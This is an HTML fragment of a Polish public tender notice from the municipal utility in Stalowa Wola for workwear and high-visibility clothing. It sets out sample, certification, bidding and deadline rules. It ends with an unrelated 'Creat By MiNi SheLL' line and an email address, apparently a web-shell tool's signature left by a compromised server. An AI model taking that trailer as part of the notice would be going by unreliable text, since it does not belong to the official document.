SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda załączenia wraz z ofertą przedmiotowych środków dowodowych na potwierdzenie spełniania przez oferowane dostawy wymagań określonych przez Zamawiającego 1.1 PRÓBKI ODZIEŻY - składane wraz z ofertą; nie podlegają uzupełnieniu 1)	CZĘŚĆ 1 - ODZIEŻ O PODWYŻSZONEJ WIDOCZNOŚCI I FIRMOWA - próbki 1.	Ubranie ochronne letnie o intensywnej widzialności - bluza i ogrodniczki/spodnie do pasa (poz. Nr 1 w Załączniku 8.1 do SWZ) - 1 kpl, 2.	Ocieplacz bezrękawnik (poz. Nr 3 w Załączniku 8.1 do SWZ) - 1 szt. 2)	CZĘŚĆ 2 - ODZIEŻ ROBOCZA I OCHRONNA- próbki: 1.	Koszula flanelowa robocza z długim rękawem (poz. Nr 1 w Załączniku 8.2 do SWZ) - 1 szt., 2.	Kalesony grube (poz. Nr 2 w Załączniku 8.2 do SWZ) - 1 szt., 3.	Bluza polar (poz. Nr 10 w Załączniku 8.2 do SWZ) - 1 szt., 4.	Ubranie ochronne przeciwdeszczowe o intensywnej widzialności - kurtka i spodnie (poz. Nr 15 w Załączniku 8.2 do SWZ) - 1 kpl. 5.	Płaszcz wodoodporny i wiatroszczelny (poz. Nr 16 w Załączniku 8.2 do SWZ) - 1 szt. 1.2	CERTYFIKATY/ DEKLARACJE ZGODNOŚCI - składane wraz z ofertą; podlegają uzupełnieniu 1)	CZĘŚĆ 1 - ODZIEŻ O PODWYŻSZONEJ WIDOCZNOŚCI I FIRMOWA- kategoria ochrony widzialności 1.	Ubranie ochronne letnie o intensywnej widzialności - bluza i ogrodniczki/ spodnie do pasa (poz. Nr 1 w Załączniku 8.1 do SWZ), 2.	Ubranie ochronne zimowe, przeciwdeszczowe o intensywnej widoczności - kurtka i ogrodniczki/ spodnie do pasa (poz. Nr 2 w Załączniku 8.1 do SWZ), 3.	Ocieplacz bezrękawnik (poz. Nr 3 w Załączniku 8.1 do SWZ), 4.	Kurtka ochronna o intensywnej widoczności, chroniąca przed zimnem i deszczem (poz. Nr 4 w Załączniku 8.1 do SWZ). Na potwierdzenie, że zaproponowane produkty spełniają wymagania dot. intensywnej widzialności wg normy ISO20471 lub równoważne Wykonawca złoży wraz z ofertą certyfikat badania typu UE wydany przez jednostkę notyfikowaną uprawnioną do przeprowadzenia oceny zgodności produktów określonych w normach i przepisach prawnych lub deklarację zgodności UE producenta. Deklaracja zgodności powinna zawierać m.in. numer certyfikatu, datę jego wydania oraz nazwę jednostki notyfikowanej przeprowadzającej badania w zakresie wymagań normy ISO20471 lub równoważne. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży ww. certyfikatów/ deklaracji zgodności, o których mowa w Rozdziale VI ust. 1 pkt 1.2 SWZ, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę stanowi wypełniony Formularz ofertowy według wzoru stanowiącego Załącznik nr 1 do SWZ wraz z próbkami i certyfikatami/ deklaracjami zgodności opisanymi w Rozdziale VI SWZ oraz niżej wymienione dokumenty:<br/>1) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu - Załącznik nr 2 do SWZ,<br/>2) (jeżeli dotyczy) zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy - Załącznik nr 3 do SWZ,<br/>3) (jeżeli dotyczy) pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy dla osoby/osób podpisującej/cych ofertę,<br/>4) (jeżeli dotyczy) pełnomocnictwo ustanowione dla pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>5) (jeżeli dotyczy) oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy - Załącznik nr 4 do SWZ,<br/>6) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji Informacji o Działalności Gospodarczej lub inny właściwy rejestr - w celu potwierdzenia umocowania osoby (osób) podpisującej ofertę, pełnomocnictwa i pozostałe dokumenty złożone wraz z ofertą,<br/>7) (jeżeli dotyczy) odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub inny właściwy rejestr dotyczący podmiotu udostępniającego zasoby - w celu potwierdzenia umocowania osoby (osób), która podpisała zobowiązanie o udostępnieniu zasobów.<br/>8) (jeżeli dotyczy) w przypadku gdy oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233),<br/>Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku. Plik z tajemnicą przedsiębiorstwa nie może być łączony z innymi plikami w jednym archiwum podpisywanym elektronicznie. Niespełnienie tych zasad zachowania poufności będzie skutkować uznaniem takich informacji za jawne. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX pkt 3 SWZ, składa każdy z wykonawców.<br/>Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy - załącznik nr 4 do SWZ. Na podstawie przepisu art. 117 ust. 3 ustawy Pzp Zamawiający informuje, że uzna za spełniony warunek dotyczący zdolności technicznej lub zawodowej w zakresie doświadczenia - gdy co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełni dany warunek samodzielnie w całości lub niektórzy albo wszyscy Wykonawcy spełniają określony warunek w całości. Niedopuszczalne jest łączenie elementów/ zakresów tegoż warunku w ramach doświadczenia posiadanego przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia – celem wykazania spełniania warunku udziału w postępowaniu w całości. W przypadku wykazywania przez jednego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia doświadczenia w pracach/części prac z innym podmiotem - dla wykazania doświadczenia. Zamawiający dopuszcza tylko to oświadczenie tegoż Wykonawcy, które wynika z jego faktycznego udziału w danym zakresie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewidział zmiany postanowień umownych. Dopuszczalne są m. in. następujące rodzaje i warunki istotnej zmiany treści umowy:<br/>1) zmniejszenie zakresu przedmiotu zamówienia w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy w pierwotnym zakresie nie leży w interesie Zamawiającego, czego nie można było przewidzieć w chwili zawarcia umowy,<br/>2) zmiana wysokości wynagrodzenia w związku z okolicznościami wymienionymi w pkt 1,<br/>3) zmiana terminu realizacji przedmiotu zamówienia, w przypadkach wskazanych przez Zamawiającego,<br/>4) zmiana wysokości wynagrodzenia w przypadku zmiany:<br/>a) zmiany stawki podatku od towarów i usług,<br/>b) zmiany stawki podatku akcyzowego,<br/>c) zmiany wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej,<br/>d) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub zmiany wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne<br/>e) zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych,<br/>5) waloryzację wynagrodzenia po spełnieniu warunków zawartych w projektowanych postanowieniach umownych.<br/>Szczegółowe zapisy dot. warunków zmian umowy zawiera § 10 projektowanych postanowień umowy- Załącznik nr 5 (A i B) do SWZ.<br/>Wszelkie zmiany umowy wymagają zgody obu stron wyrażonej w formie pisemnego aneksu do umowy pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mzk-stalowawola.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-14 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-12-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Postępowanie prowadzone jest przy użyciu komunikacji elektronicznej. W ZAKRESIE ZŁOŻENIA PRÓBEK Zamawiający na podstawie art. 65 ust. 1 pkt 4) ustawy Pzp odstępuje od wymogu użycia środków komunikacji elektronicznej. 1) Wykonawca złoży próbki w Sekretariacie Miejskiego Zakładu Komunalnego w Stalowej Woli (ul. Komunalna 1, 37-450 Stalowa Wola) lub prześle na adres: Miejski Zakład Komunalny Sp. z o.o., ul. Komunalna 1, 37- 450 Stalowa Wola. Próbki należy przygotować i dostarczyć jak poniżej: a) wszystkie oferowane próbki należy opisać, tj. podać nazwę części i podać adres Wykonawcy, b) opisane próbki wraz z listą dostarczanych wzorów ubiorów służbowych, odzieży roboczej i próbek tkanin, należy umieścić w opakowaniu, które następnie należy opisać: „Wzory i próbki tkanin w postępowaniu na dostawę ubiorów służbowych oraz odzieży roboczej dla pracowników Miejskiego Zakładu Komunalnego w Stalowej Woli; Część/ci … Nie otwierać do dnia 14.11.2025 r. do godz. 11:00. 3) Próbki należy złożyć przed terminem składania ofert. 4) Wzory oferowanych ubiorów służbowych i odzieży roboczej oraz próbki tkanin stanowią integralną część oferty i nie podlegają uzupełnieniu na podstawie art. 107 ust. 3 ustawy Prawo zamówień publicznych. W przypadku niedołączenia wzorów lub próbek do oferty, oferta podlegać będzie odrzuceniu na podstawie art. 226 ust. 1 pkt 2 lit. c ustawy Prawo zamówień publicznych. 5) Zamawiający zwraca Wykonawcom, których oferty nie zostały wybrane, na ich wniosek, złożone przez nich próbki. 6) Próbki otrzymane od Wykonawcy, którego oferta została wybrana do realizacji zamówienia, zostaną zatrzymane i będą stanowiły załącznik do umowy. Na etapie realizacji umowy będą służyły Zamawiającemu do porównywania wzorów z dostarczanym przedmiotem zamówienia i będą przechowywane przez okres wskazany w art. 78 ust. 1 ustawy Prawo zamówień publicznych.

Creat By MiNi SheLL
Email: jattceo@gmail.com